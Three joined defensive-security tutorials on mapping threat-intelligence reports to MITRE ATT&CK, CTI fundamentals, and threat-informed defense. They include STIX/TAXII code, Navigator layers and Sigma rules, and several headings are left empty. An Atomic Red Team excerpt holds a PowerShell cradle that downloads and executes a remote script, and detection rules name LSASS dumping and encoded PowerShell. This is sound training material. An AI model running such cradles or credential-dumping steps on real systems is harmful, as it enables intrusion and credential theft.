Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology

Objective: Learn to parse a real-world cyber threat intelligence (CTI) report and systematically translate its narrative behaviors into precise MITRE ATT&CK tactics, techniques, and sub-techniques — producing an accurate, reusable TTP layer that drives detection engineering, threat hunting, and adversary emulation planning.

1. Why TTP Mapping Matters More Than IOCs

Traditional Indicators of Compromise (IOCs) — hashes, IP addresses, domains — are brittle. An adversary rotates infrastructure and recompiles payloads cheaply, so a hash-based detection expires the moment the campaign moves. Tactics, Techniques, and Procedures (TTPs) describe behavior, which is far costlier for an adversary to change. Re-tooling how you dump LSASS or beacon over HTTPS is expensive; swapping a C2 IP is trivial.

MITRE ATT&CK encodes this behavioral layer into a shared vocabulary. When you map a CTI report to ATT&CK, you convert prose (“the actor ran an encoded PowerShell loader”) into a stable, machine-referenceable identifier (T1059.001) that every tool, team, and report understands. That identifier outlives the campaign and feeds detection, hunting, and emulation directly.

2. ATT&CK Architecture: Tactics, Techniques, Sub-techniques, and Procedures

ATT&CK is a knowledge base of adversary behavior built on three structural levels.

A procedure is the real-world, in-the-wild instance of a technique — the exact way a named group performed it. Procedures appear on each technique page as cited examples.

The 14 Enterprise Tactics

Technique IDs follow the T#### convention; sub-techniques append .### (e.g., T1021, T1059.003). These identifiers standardize communication across detection engineering, intelligence reporting, and red team planning. ATT&CK is versioned — IDs can be deprecated or renumbered across major releases — so always verify against the live matrix at attack.mitre.org.

3. Sourcing and Preparing a CTI Report for Analysis

CTI arrives at three altitudes. Strategic intelligence describes who and why at a board level. Operational intelligence describes campaign-level capability and intent. Tactical intelligence — vendor incident reports, CISA advisories, ISAC bulletins, OSINT write-ups — describes the granular actions you can actually map.

A report is mappable when it describes what the adversary did, not just what it was. Strip attribution bias: the goal is behavior, not a flag. Before mapping, read the full report once end-to-end, then segment the narrative into discrete adversary actions. Each action is a candidate for one or more ATT&CK techniques.

4. The Four-Step Mapping Methodology

CISA’s Best Practices for MITRE ATT&CK Mapping defines a canonical four-step loop. Run it once per behavior.

1. Identify the behavior — extract what the adversary did from the narrative, quoting the source verbatim.
2. Research the behavior — understand the technical action being described; resolve vendor jargon to a concrete mechanism.
3. Translate the behavior into a tactic — identify the adversary’s goal (the why).
4. Identify the technique and sub-technique — match the how against the matrix.

Worked example. Take the narrative: “The actor delivered a spearphishing attachment, then executed an obfuscated PowerShell loader and accessed LSASS memory with a renamed procdump binary.”

Automation helps the first pass. The script below surfaces candidate tactics from raw text — a triage aid, never a final answer.

# First-pass triage only — surfaces CANDIDATE tactics for manual review.
TACTIC_KEYWORDS = {
    "TA0001": ["phishing", "spearphishing", "supply chain", "exploited public"],
    "TA0002": ["powershell", "executed", "ran script", "command interpreter"],
    "TA0005": ["obfuscated", "base64", "encoded", "disabled logging"],
    "TA0006": ["lsass", "credential", "dumped", "mimikatz"],
    "TA0011": ["beacon", "c2", "https post", "command and control"],
}

def candidate_tactics(report_text: str):
    text = report_text.lower()
    return {ta: [w for w in words if w in text]
            for ta, words in TACTIC_KEYWORDS.items()
            if any(w in text for w in words)}

excerpt = ("The actor used a spearphishing attachment, then ran an "
           "obfuscated PowerShell loader and dumped LSASS memory.")
for ta, words in candidate_tactics(excerpt).items():
    print(ta, "->", words)

If a sub-technique is not easily identifiable — and there may not be one in every case — review the procedure examples on the technique page. They link the source CTI reports behind the original mapping and may affirm your choice or suggest an alternative. There is always a possibility a behavior is a new technique not yet covered in ATT&CK.

5. Disambiguation: Choosing the Right Technique When Multiple Apply

Ambiguity is the hard part. One behavior frequently maps to several tactics. T1078 Valid Accounts spans Initial Access (TA0001), Persistence (TA0003), Privilege Escalation (TA0004), and Defense Evasion (TA0005) — the correct tactic depends on what the account was used for in that step, not the account itself.

Rules of thumb:

• Map to the tactic that matches the adversary’s goal at that moment, not every goal the technique can serve.
• Prefer the technique level when the report lacks the detail to justify a sub-technique. Forcing T1003.001 when the report only says “stole credentials” is over-mapping.
• Use the procedure examples to calibrate. If your behavior reads nothing like the cited procedures, re-investigate.
• T1218 System Binary Proxy Execution and T1027 Obfuscated Files or Information often co-occur with execution techniques — record them as distinct Defense Evasion entries rather than collapsing them.

6. The Analyst Mapping Worksheet

The core analyst deliverable is a worksheet that preserves the audit trail from quote to ID. Confidence and rationale columns make the mapping reviewable.

This worksheet becomes the source of truth that all downstream artifacts — Navigator layers, Sigma rules, emulation plans — derive from.

7. Tooling: ATT&CK Navigator, Decider, and the STIX/TAXII API

ATT&CK Navigator is MITRE’s web tool for visually annotating the matrix. You represent a mapped TTP set as a versioned layer JSON — a portable, diff-able artifact you commit to version control.

{
  "name": "APT-Sample CTI Mapping",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "description": "TTPs extracted from CTI report; scored by confidence.",
  "techniques": [
    { "techniqueID": "T1566.001", "score": 100, "color": "#e60d0d",
      "comment": "Spearphishing attachment delivered loader (High)" },
    { "techniqueID": "T1059.001", "score": 100, "color": "#e60d0d",
      "comment": "Obfuscated PowerShell stager (High)" },
    { "techniqueID": "T1003.001", "score": 75, "color": "#e68a0d",
      "comment": "LSASS access via renamed procdump (Medium)" }
  ]
}

CISA Decider eases disambiguation by asking a series of guided questions about adversary activity, walking you to the correct tactic, technique, or sub-technique — invaluable when an analyst is uncertain.

For programmatic work, query the public read-only TAXII 2.1 endpoint (https://attack-taxii.mitre.org/, Enterprise collection x-mitre-collection--1f5f1533-f617-4ca8-9ab4-6a02367fa019). The ATT&CK dataset is STIX 2.1 JSON: techniques are attack-pattern objects, groups are intrusion-set, software is malware / tool. Pull techniques attributed to a group to cross-check your mapping against MITRE’s own group profile.

from mitreattack.stix20 import MitreAttackData

# Load the Enterprise STIX 2.1 bundle (download once from attack-stix-data)
attack = MitreAttackData("enterprise-attack.json")

# Resolve a threat group alias to its intrusion-set object
group = attack.get_groups_by_alias("APT29")[0]

# Enumerate every technique attributed to the group
for t in attack.get_techniques_used_by_group(group["id"]):
    obj = t["object"]
    print(attack.get_attack_id(obj["id"]), "\t", obj["name"])

8. From TTP Map to Adversary Profile

Aggregate worksheets across an entire campaign to build an adversary profile. Correlate your mapped techniques against the relevant ATT&CK Groups page to validate consistency and surface techniques the actor is known to use but the report omitted. Score the aggregated layer by frequency or confidence to produce a TTP heat map, then prioritize against your priority intelligence requirements (PIRs). The heat map feeds directly into detection gap analysis.

import csv, json

# Load the mapped TTP layer and the internal detection inventory
layer = json.load(open("cti_layer.json"))
covered = set()
with open("detection_coverage.csv") as fh:            # cols: technique_id, rule_name
    for row in csv.DictReader(fh):
        covered.add(row["technique_id"])

print("TechniqueID\tCovered")
for t in layer["techniques"]:
    tid = t["techniqueID"]
    print(f"{tid}\t{tid in covered}")

9. Quality Assurance: Peer Review and Common Mapping Errors

A formal peer review of an annotated report shares perspectives, promotes learning, and improves accuracy. A second analyst routinely catches TTPs missed in the first pass and enforces mapping consistency across the team.

Watch for these recurring errors:

• Over-mapping — assigning techniques the report does not support.
• Under-mapping — missing key behaviors buried in the narrative.
• Conflating technique with tactic — recording a goal where a behavior belongs.
• Misidentifying sub-techniques — forcing .### granularity the source lacks.
• Mapping to deprecated techniques — always validate against the current ATT&CK version.

10. Common Attacker Techniques in CTI Reports

These behaviors dominate tactical CTI and should be in every analyst’s recognition vocabulary.

11. Defensive Strategies & Detection

The output of mapping is a prioritized list of behaviors to detect. Each ATT&CK technique page lists Data Sources (e.g., DS0009 Process, DS0011 Module, DS0017 Command, DS0022 File, DS0028 Logon Session, DS0029 Network Traffic) and Mitigations (e.g., M1038 Execution Prevention, M1026 Privileged Account Management). Pull these per technique to convert the map into telemetry requirements and hardening tasks.

Sysmon Events Tied to Mapped Behaviors

Enable the supporting Windows audit policies: Audit Process Creation (Event ID 4688 with command line), Audit Logon Events (4624/4625/4648 for T1078), Audit Object Access → SAM (4661 for T1003), and PowerShell Script Block Logging (4104 for T1059.001).

A Sigma rule operationalizes one mapped technique. Tags follow attack.t1003_001 (lowercase, underscore for the sub-technique separator) and attack.ta0006 for the tactic.

title: Cross-Process Access to LSASS Memory
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess: '0x1410'
  condition: selection
tags:
  - attack.t1003_001
  - attack.ta0006
level: high

Feed the completed layer into DeTT&CT (Detect Tactics, Techniques & Combat Threats) to align mapped TTPs against your data source visibility and detection coverage — the natural follow-on to mapping. The same layer drives the red team emulation plan, ensuring offensive testing exercises the exact behaviors the CTI reported.

12. Tools for CTI Mapping Analysis

13. MITRE ATT&CK Mapping Reference

Summary

• CTI-to-ATT&CK mapping converts perishable IOCs into durable, behavioral TTPs that survive across campaigns and standardize defensive communication.
• ATT&CK is structured as tactics (the why), techniques (the how), and sub-techniques (granular methods), each with stable TA#### / T####.### identifiers.
• The CISA four-step loop — identify, research, translate to tactic, identify technique — produces an auditable mapping worksheet that anchors every downstream artifact.
• Navigator layers, CISA Decider, and the public TAXII 2.1 STIX endpoint operationalize and version-control the mapping; peer review guards against over-mapping, under-mapping, and tactic/technique confusion.
• The finished TTP map drives detection engineering directly — pulling ATT&CK Data Sources, Sysmon Event IDs, audit policies, and Sigma rules per technique, and feeding DeTT&CT coverage analysis and emulation plans.

Related Tutorials

• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers
• Introduction to MITRE ATT&CK: Structure, Tactics, Techniques, and Sub-Techniques
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Passive OSINT: Mapping the Target Without Touching It

References

• Best Practices for MITRE ATT&CK® Mapping (CISA)
• MITRE ATT&CK® – Get Started: Threat Intelligence
• MITRE ATT&CK® – Get Started: Adversary Emulation and Red Teaming
• MITRE ATT&CK® – Adversary Emulation Plans
• Getting Started with ATT&CK: Threat Intelligence (Official MITRE ATT&CK® Blog)
• Center for Threat-Informed Defense – Adversary Emulation Library (GitHub)

Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle

Objective: Understand what Cyber Threat Intelligence is, the four intelligence types, the six-phase intelligence lifecycle, primary collection sources, the exchange standards (STIX/TAXII/TLP), and the analytic frameworks — Kill Chain, Diamond Model, Pyramid of Pain, and MITRE ATT&CK — that let defenders and authorized red teamers operationalize intelligence into detection.

1. What Is CTI? (And What It Is Not)

Cyber Threat Intelligence is evidence-based knowledge about adversaries — their capabilities, infrastructure, motivations, and behaviors — refined to support decisions. CTI is not a raw feed of IP addresses, and it is not a SIEM alert. It is the product of a deliberate analytic process.

The distinction is a pipeline:

• Data — discrete, context-free observations (a hash, a domain, a log line).
• Information — data aggregated and given context (a domain resolving to a host serving a known dropper).
• Intelligence — analyzed information answering a stakeholder question (“Is the group behind this dropper targeting our sector, and can our controls detect them?”).

CTI exists to reduce uncertainty for a decision-maker. If a piece of output does not change a defensive action, an investment, or a hunt hypothesis, it is information — not intelligence.

2. The Four Intelligence Types

CTI is stratified by audience and shelf-life. The four-type model (used by NIST SP 800-150 and several vendors) cleanly separates human-consumable TTPs from machine-consumable IOCs.

Trace one actor across all four levels. Strategic: “An espionage group aligned with Nation X is escalating against the energy sector.” Operational: “That group is running a spearphishing campaign against utility OT vendors this quarter.” Tactical: “They use T1566.001 (Spearphishing Attachment) followed by T1059.001 (PowerShell) for execution.” Technical: “The current dropper SHA-256 is e3b0c4... and the C2 domain is cdn-update.example.”

Note the inversion of value and durability: technical IOCs are the most actionable but decay in minutes; strategic intelligence shapes decisions for years.

3. CTI Sources: Where the Data Comes From

CTI is collected across the classic intelligence disciplines, adapted to the cyber domain.

Additional subcategories include measurement-and-signature intelligence, social-media intelligence (SOCMINT), geospatial intelligence (GEOINT), and Deep/Dark Web intelligence.

Sharing communities multiply source value. Sharing anonymized insights with trusted partners — notably Information Sharing and Analysis Centers (ISACs) — helps peers prepare for the same threats. Sector examples include FS-ISAC (financial services), H-ISAC (health), and E-ISAC (electricity). Membership turns one organization’s incident into the whole sector’s early warning.

4. The Intelligence Lifecycle (Six Phases)

The lifecycle is a continuous loop. Output from one cycle refines the inputs of the next.

The feedback loop is what separates an intelligence program from an IOC firehose. If the SOC reports that disseminated intelligence never fired a single detection, the next planning phase re-scopes collection.

Governing standard: NIST SP 800-150 (Guide to Cyber Threat Information Sharing) establishes governance, legal, and technical best practices for inter-organizational sharing. ISO/IEC 27001:2022 Control 5.7 formally requires organizations to collect, analyze, and share relevant threat intelligence — making a documented lifecycle a compliance artifact, not just good hygiene.

5. Intelligence Formats & Sharing Standards

Machine-to-machine sharing requires structure. Four standards govern format, transport, and handling.

STIX models intelligence as graph objects. STIX Domain Objects (SDOs) are the nodes; STIX Relationship Objects (SROs) are the edges.

Building a STIX 2.1 Bundle (Python):

from stix2 import ThreatActor, AttackPattern, Relationship, Bundle

actor = ThreatActor(
    name="Fictitious Bear",
    description="Illustrative espionage group (teaching example)",
    threat_actor_types=["nation-state"],
)

technique = AttackPattern(
    name="Spearphishing Attachment",
    external_references=[{
        "source_name": "mitre-attack",
        "external_id": "T1566.001",   # technique reference
    }],
)

# SRO: actor 'uses' technique
uses = Relationship(actor, "uses", technique)

bundle = Bundle(actor, technique, uses)
print(bundle.serialize(pretty=True))

A minimal STIX 2.1 Indicator (JSON):

{
  "type": "indicator",
  "spec_version": "2.1",
  "id": "indicator--8e2e2d2b-17d4-4cbf-938f-98ee46b3cd3f",
  "created": "2026-01-15T12:00:00.000Z",
  "modified": "2026-01-15T12:00:00.000Z",
  "name": "Dropper file hash (fictitious)",
  "indicator_types": ["malicious-activity"],
  "pattern": "[file:hashes.'SHA-256' = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']",
  "pattern_type": "stix",
  "valid_from": "2026-01-15T12:00:00Z"
}

TLP discipline is operational, not decorative. TLP:RED intelligence must never be imported into a shared SIEM tenant or multi-tenant TIP. TAXII 2.1 collections are pulled over HTTPS with a bearer token (Authorization: Bearer <token>); enforce TLP at ingestion so a marking can never be stripped downstream.

6. Analytic Frameworks: Kill Chain, Diamond Model, Pyramid of Pain

Frameworks impose structure on raw observations. Each answers a different question.

The Lockheed Martin Cyber Kill Chain (Hutchins et al., 2011) models an intrusion as seven sequential phases: Reconnaissance → Weaponization → Delivery → Exploitation → Installation → Command & Control → Actions on Objectives. Use it to check coverage balance — an adversary who evades detection at Delivery should still trip a control at C2.

The Diamond Model of Intrusion Analysis (Caltagirone, Pendergast, Betz — articulated 2006, published 2013) conceptualizes any event as relationships between four vertices: Adversary, Capability, Infrastructure, Victim. It is predictive: known three vertices often imply the fourth.

The Pyramid of Pain (David Bianco, 2013) ranks indicators by how much pain their loss causes the adversary:

                    /\
                   /  \   TTPs ............... hardest to change (apex)
                  /----\
                 / Tools \  Cobalt Strike, Mimikatz, malware families
                /--------\
               / Network &  \  JA3, URI patterns, registry keys, named pipes
              /  Host Artifacts\
             /------------------\
            /   Domain Names      \  trivial to rotate
           /----------------------\
          /  IP Addresses           \  trivial to rotate
         /--------------------------\
        /   Hash Values               \  changed in seconds (base)
       /------------------------------\

Hashes and IPs sit at the base — trivial detection value, replaced in seconds. TTPs occupy the apex: forcing an adversary to abandon PowerShell-based execution or spearphishing imposes real engineering cost. This is the strategic argument for behavior-based detection.

7. MITRE ATT&CK as a CTI Backbone

MITRE ATT&CK is a globally accessible knowledge base of adversary behaviors built from real-world observation. Unlike IOC-centric models, it focuses on TTPs — a behavioral approach. Every technique carries a stable ID such as T1021 or T1059.003, giving detection engineering, reporting, and red-team planning a shared vocabulary.

Key ATT&CK objects in CTI workflows:

• Groups (intrusion-set) — e.g., APT29 (G0016), APT41 (G0096), Lazarus Group (G0032)
• Software (malware/tool) — e.g., Cobalt Strike (S0154), Mimikatz (S0002)
• Campaigns (campaign) — e.g., C0017, C0018
• Techniques — e.g., T1566 (Phishing), T1071.001 (Web Protocols C2), T1003 (OS Credential Dumping)

ATT&CK ships as STIX, so it is programmatically queryable. Enumerate every technique attributed to a group:

from mitreattack.stix20 import MitreAttackData

attack = MitreAttackData("enterprise-attack.json")
group = attack.get_groups_by_alias("APT29")[0]
techniques = attack.get_techniques_used_by_group(group.id)

for t in techniques:
    tech = t["object"]
    tid = tech.external_references[0].external_id
    print(f"{tid}\t{tech.name}")

Feed the resulting technique list into ATT&CK Navigator to build a heat-map. Overlay your detection coverage against the group’s TTPs and the gaps become your next intelligence requirements.

8. From Intelligence to Detection: Operationalizing CTI

Intelligence that never reaches a sensor is wasted. The pipeline is: ATT&CK technique → detection hypothesis → log source → detection rule.

Take T1059.001 (PowerShell). Hypothesis: encoded command execution is rare in this environment and worth alerting. Log source: PowerShell Script Block Logging (Event ID 4104). Rule:

title: Suspicious PowerShell Encoded Command Execution
id: 6e8a1f3c-2b7d-4f9a-9c1e-0a2b3c4d5e6f
status: experimental
logsource:
  product: windows
  service: powershell
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains:
      - '-enc '
      - 'FromBase64String'
  condition: selection
level: high
tags:
  - attack.execution
  - attack.t1059.001

Every Sigma rule tied to a technique is a step up the Pyramid of Pain. The tags field (attack.<tactic>, attack.t<technique>) keeps each rule linked to the framework, so coverage roll-up is automatic.

Invest accordingly: spend disposable effort on IOC matching (high churn, low pain to adversary) and durable engineering effort on TTP detections (low churn, high pain). STIX/TAXII feeds drive SIEM/SOAR enrichment so analysts triage against context instead of researching every artifact by hand.

9. CTI for Red Teams and Defenders: Two Sides of the Same Brief

Adversary emulation is CTI consumed offensively. A red team ingests a finished report on “Fictitious Bear,” extracts the ATT&CK technique set, and emulates only those TTPs to validate whether controls fire. The blue team consumes the identical brief to confirm the same detections exist. One brief, two scopes, one shared technique vocabulary.

Scope is a legal control, not a courtesy. Emulation must stay inside an authorized rules-of-engagement document. Respect TLP on the source intelligence: a TLP:AMBER report informs an internal exercise but cannot be republished in a public write-up.

10. Common Attacker Techniques

Adversaries run their own intelligence cycle against you. CTI teams must practice counter-intelligence awareness.

Counter-intelligence implication: assume your public footprint (and your IOC feeds) are adversary collection targets. Watch for reconnaissance against your own brand and credentials.

11. Defensive Strategies & Detection

CTI is itself a defensive discipline. Operationalize feeds against host and network telemetry.

Sysmon Event IDs for IOC operationalization:

ETW providers for TTP-level hunting: Microsoft-Windows-DNS-Client (domain IOC matching), Microsoft-Windows-PowerShell/Operational (T1059.001), and Microsoft-Windows-Sysmon/Operational (broad process/network/file telemetry).

Audit policy: enable Audit Process Creation (Success) for process-IOC correlation, and turn on PowerShell Script Block Logging via GPO for behavioral visibility.

A Sigma rule matching a CTI-sourced malicious domain against DNS telemetry:

title: DNS Query to CTI-Listed Malicious Domain
id: 1f2a3b4c-5d6e-7f80-91a2-b3c4d5e6f708
status: experimental
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 22
    QueryName|endswith:
      - 'cdn-update.example'    # fictitious C2 domain
  condition: selection
level: high
tags:
  - attack.command_and_control
  - attack.t1071.001

Program controls: enforce TLP at ingestion in the TIP; gate raw IOC feeds behind de-duplication and decay scoring before SIEM import; run an intelligence-requirement review tied to ATT&CK Navigator coverage gaps; and use the Kill Chain quarterly to check detection balance across the attack lifecycle.

12. Tools for CTI Analysis

13. MITRE ATT&CK Mapping

14. Summary

• CTI is analyzed, decision-ready knowledge about adversaries — not a raw IOC feed — produced by a disciplined six-phase lifecycle.
• The four intelligence types (strategic, operational, tactical, technical) trade durability against immediacy; technical IOCs decay in minutes while strategic intelligence endures for years.
• STIX 2.1, TAXII 2.1, and TLP standardize how intelligence is represented, exchanged, and handled — enforce TLP at ingestion so TLP:RED never leaks downstream.
• The Diamond Model, Kill Chain, Pyramid of Pain, and MITRE ATT&CK interlock; TTP-level intelligence at the pyramid apex outlasts IOC-level intelligence at its base.
• Operationalize CTI by converting ATT&CK techniques into Sigma rules and matching IOC feeds against Sysmon EventID 1/3/7/22, closing the loop with stakeholder feedback.

Related Tutorials

• Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology
• Red Teaming Fundamentals: Mindset, Methodology, and Engagement Types
• Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers

References

• MITRE ATT&CK® – Adversary Emulation Plans
• MITRE ATT&CK® – Get Started: Threat Intelligence
• MITRE ATT&CK® for Cyber Threat Intelligence (CTI) Training
• NIST SP 800-150 – Guide to Cyber Threat Information Sharing
• CISA – Service Models for Cyber Threat Intelligence (White Paper)
• CISA – Cyber Threat Information Sharing (CTIS) – Shared Cybersecurity Services

Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle

Objective: Understand how defenders operationalize adversary knowledge — the Pyramid of Pain, MITRE ATT&CK, the CTI lifecycle, STIX/TAXII, M3TID/INFORM, and adversary emulation — into a continuous, measurable intelligence-driven security cycle rather than reacting to brittle indicators.

1. The Problem With Reactive Defense

Indicator-centric programs fail because indicators are cheap for the adversary to change. Hashes, IP addresses, and domains rotate trivially — a recompile changes a hash; a new VPS changes an IP. As popularized by David Bianco’s Pyramid of Pain (2013), these atomic indicators detect an adversary only for a fleeting window.

The Pyramid ranks indicator types by how much pain it causes an adversary to change them:

Documenting activity at the TTP level lets defenders think at an abstraction that is concrete enough to be actionable, yet stable enough to remain valid across adversaries and over time. Unlike traditional models that focus on indicators of compromise (IOCs), behavioral defense maps how adversaries operate once inside the environment. That is the foundation of Threat-Informed Defense.

2. What Is Threat-Informed Defense?

Threat-Informed Defense (TID) is the systematic application of a deep understanding of adversary tradecraft and technology to improve defenses. The MITRE Center for Threat-Informed Defense (CTID) defines it across three operationalized dimensions:

The shift is from “Are we patched?” to “Are we defended against these adversaries?” TID is a mindset that prioritizes finite defensive budget against the behaviors that actually threaten your sector.

3. MITRE ATT&CK: Architecture and Anatomy

The MITRE ATT&CK® Framework is a globally accessible knowledge base of adversary TTPs based on real-world observations. Its core objects:

The 14 Enterprise tactics, in order: Reconnaissance (TA0043), Resource Development (TA0042), Initial Access (TA0001), Execution (TA0002), Persistence (TA0003), Privilege Escalation (TA0004), Defense Evasion (TA0005), Credential Access (TA0006), Discovery (TA0007), Lateral Movement (TA0008), Collection (TA0009), Command and Control (TA0011), Exfiltration (TA0010), Impact (TA0040). ATT&CK is versioned — always confirm IDs against attack.mitre.org.

ATT&CK is distributed as STIX 2.1. You can parse the public bundle directly to enumerate every technique:

from stix2 import MemoryStore, Filter

store = MemoryStore()
store.load_from_file("enterprise-attack.json")  # mitre/cti repo

for t in store.query([Filter("type", "=", "attack-pattern")]):
    for ref in t.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            print(ref["external_id"], "-", t["name"])

ATT&CK Navigator visualizes and compares coverage layers (JSON format), while ATT&CK Workbench lets organizations manage and extend a local copy of the knowledge base in sync with the public one.

4. The CTI Lifecycle: From Raw Data to Prioritized TTPs

Intelligence is produced, not collected ad hoc. The six-phase CTI lifecycle maps cleanly onto the TID dimensions:

Structured intelligence is exchanged with STIX 2.1 (the data model) over TAXII 2.1 (the transport, supporting Collections and Channels). Open platforms — MISP and OpenCTI — ingest STIX bundles manually, via connectors, or by subscribing to a TAXII feed.

A minimal shareable STIX bundle links a threat actor to a technique through a relationship:

from stix2 import ThreatActor, AttackPattern, Relationship, Bundle, ExternalReference

actor = ThreatActor(name="APT29", labels=["nation-state"])

technique = AttackPattern(
    name="Spearphishing Attachment",
    external_references=[ExternalReference(
        source_name="mitre-attack",
        external_id="T1566.001",
        url="https://attack.mitre.org/techniques/T1566/001")])

rel = Relationship(actor, "uses", technique)
print(Bundle(actor, technique, rel).serialize(pretty=True))

Automating the loop turns a TAXII feed into a prioritized TTP list for the detection team:

from taxii2client.v21 import Server
from stix2 import parse
import csv

server = Server("https://taxii.example-isac.org/taxii2/",
                user="analyst", password="<token>")
collection = server.api_roots[0].collections[0]

ttps = []
for obj in collection.get_objects().get("objects", []):
    so = parse(obj, allow_custom=True)
    if so.get("type") == "attack-pattern":
        for ref in so.get("external_references", []):
            if ref.get("source_name") == "mitre-attack":
                ttps.append((ref["external_id"], so["name"]))

with open("prioritized_ttps.csv", "w", newline="") as f:
    csv.writer(f).writerows([("technique_id", "name"), *sorted(set(ttps))])

5. Building a Sector-Specific Threat Model

You cannot defend against everything, so prioritize. Select the ATT&CK Groups relevant to your sector, extract their techniques, and weight by frequency using CTID’s Sightings Ecosystem data and the Top ATT&CK Techniques Calculator.

The mitreattack-python library pulls a group’s full technique set:

from mitreattack.stix20 import MitreAttackData

data = MitreAttackData("enterprise-attack.json")
apt29 = data.get_groups_by_alias("APT29")[0]

for entry in data.get_techniques_used_by_group(apt29.id):
    tech = entry["object"]
    print(data.get_attack_id(tech.id), tech["name"])

Layer the result in the Navigator and colour cells by your current detection status. A layer file encodes that scoring directly:

{
  "name": "Detection Coverage - APT29",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "color": "#fc3b3b", "comment": "None - no email detonation telemetry" },
    { "techniqueID": "T1059.001", "color": "#33cc33", "comment": "Detected - Script Block Logging" },
    { "techniqueID": "T1055",     "color": "#ffe766", "comment": "Partial - EDR on workstations only" }
  ]
}

6. Mapping Controls to ATT&CK: The Defensive Measures Dimension

Knowing the adversary is useless without knowing your own coverage. CTID’s Mappings Explorer lets defenders see how security capabilities map to ATT&CK, and the NIST SP 800-53 ↔ ATT&CK mappings let you assess control coverage against real-world techniques.

The critical pitfall: ATT&CK coverage ≠ detection coverage. A control that can mitigate a technique is not the same as telemetry that proves you detect it. Distinguish two gap types:

Re-run the Mappings Explorer comparison before and after each emulation cycle to quantify the coverage delta — that delta is your measurable program improvement.

7. Testing & Evaluation: Closing the Loop

T&E proves defenses work by emulating real adversary behavior. Distinguish the disciplines:

MITRE CALDERA is a scalable, automated adversary-emulation platform; Atomic Red Team (Red Canary) is a library of small, ATT&CK-mapped tests for fast technique validation; and the CTID Adversary Emulation Library provides full emulation plans modeled on real threats. Run them as purple-team exercises — red executes, blue observes, both tune in real time.

# T1059.001 - atomic test metadata (excerpt)
attack_technique: T1059.001
display_name: PowerShell
atomic_tests:
  - name: Download cradle execution
    executor:
      name: powershell
      command: |
        IEX (New-Object Net.WebClient).DownloadString('#{cradle_url}')
    input_arguments:
      cradle_url:
        type: url
        default: https://example.test/benign.ps1

# Execute one atomic test, then confirm the telemetry fired
Invoke-AtomicTest T1059.001 -TestNumbers 1
# Map result -> Navigator: green only if Sysmon EID 1 + Script Block Log observed

If the test fires but no analytic alerts, you have found a detection gap — feed it straight back into the cycle.

8. M3TID and INFORM: Measuring Program Maturity

CTID’s M3TID (Measure, Maximize, Mature Threat-Informed Defense) operationalizes the three dimensions and assigns relative weighting:

The weighting reflects that defensive measures are where threat knowledge becomes protection. INFORM (Jan 2026) builds on M3TID, translating CTI, defensive measures, and T&E into a measurable, repeatable strategic maturity practice. Treat M3TID as the foundational reference and INFORM as its strategic-maturity successor — they are distinct publications, not synonyms. Self-assess each dimension, then invest where the lowest-weighted-adjusted score sits.

9. The Intelligence-Driven Security Cycle: Putting It All Together

The dimensions form a continuous loop, not a one-time audit:

1. Direction/CTI: Ingest sector intelligence via TAXII; extract prioritized TTPs.
2. Threat model: Layer relevant ATT&CK Groups in Navigator.
3. Defensive measures: Map controls via Mappings Explorer; identify gaps.
4. T&E: Emulate the TTP chain with CALDERA / Atomic Red Team.
5. Measure: Score coverage delta and M3TID maturity.
6. Feedback: Failed detections become new CTI collection requirements.

Each rotation tightens coverage against the adversaries you actually face. The loop never closes — new sightings continuously reshape the threat model.

10. Common Pitfalls and Maturity Anti-Patterns

• The “ATT&CK checkbox” fallacy — colouring a cell green for a control that is mapped but never validated.
• Retroactive labeling — tagging alerts with technique IDs after the fact instead of engineering proactive detections.
• IOC over-reliance — building the program on indicators near the bottom of the Pyramid of Pain.
• Treating the matrix as static — ATT&CK is versioned; threat models decay if not refreshed.
• Stale TTPs — driving investment from sightings years old without re-validation.

11. Common Attacker Techniques

These are the behaviors a TID program is built to detect — the worked examples throughout the cycle:

12. Defensive Strategies & Detection

TID succeeds only if emulation is observable. Validate that the following telemetry fires during every T&E run:

Anchor every detection to an ATT&CK ID so coverage is measurable. A skeleton Sigma rule for encoded PowerShell:

title: Suspicious PowerShell Encoded Command Execution
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
  condition: selection
tags:
  - attack.execution
  - attack.t1059.001
  - attack.ta0002
level: medium

Hardening baselines: enable command-line process auditing (ProcessCreationIncludeCmdLine_Enabled); enforce PowerShell Constrained Language Mode with Script Block and Module Logging; deploy Sysmon with a maintained config (e.g., SwiftOnSecurity) validated against each technique’s ATT&CK data sources; enforce a TTP expiry policy (re-validate sightings older than 24 months); and configure automated TAXII ingest from ISAC/CERT networks.

13. Tools for Threat-Informed Defense

14. MITRE ATT&CK Mapping

Summary

• Threat-Informed Defense replaces brittle IOC reaction with stable, behavior-centric defense built on adversary TTPs.
• The Pyramid of Pain motivates the shift; MITRE ATT&CK supplies the shared TTP vocabulary across Tactics, Techniques, Groups, and Mitigations.
• TID’s three dimensions — CTI, Defensive Measures, Testing & Evaluation — connect through the six-phase CTI lifecycle and exchange intelligence via STIX 2.1 over TAXII 2.1.
• M3TID measures maturity (CTI 30%, DM 50%, T&E 20%); INFORM is its strategic successor.
• Close the loop with CALDERA, Atomic Red Team, and the CTID Adversary Emulation Library, validating every technique against Sysmon and ATT&CK-tagged Sigma rules.

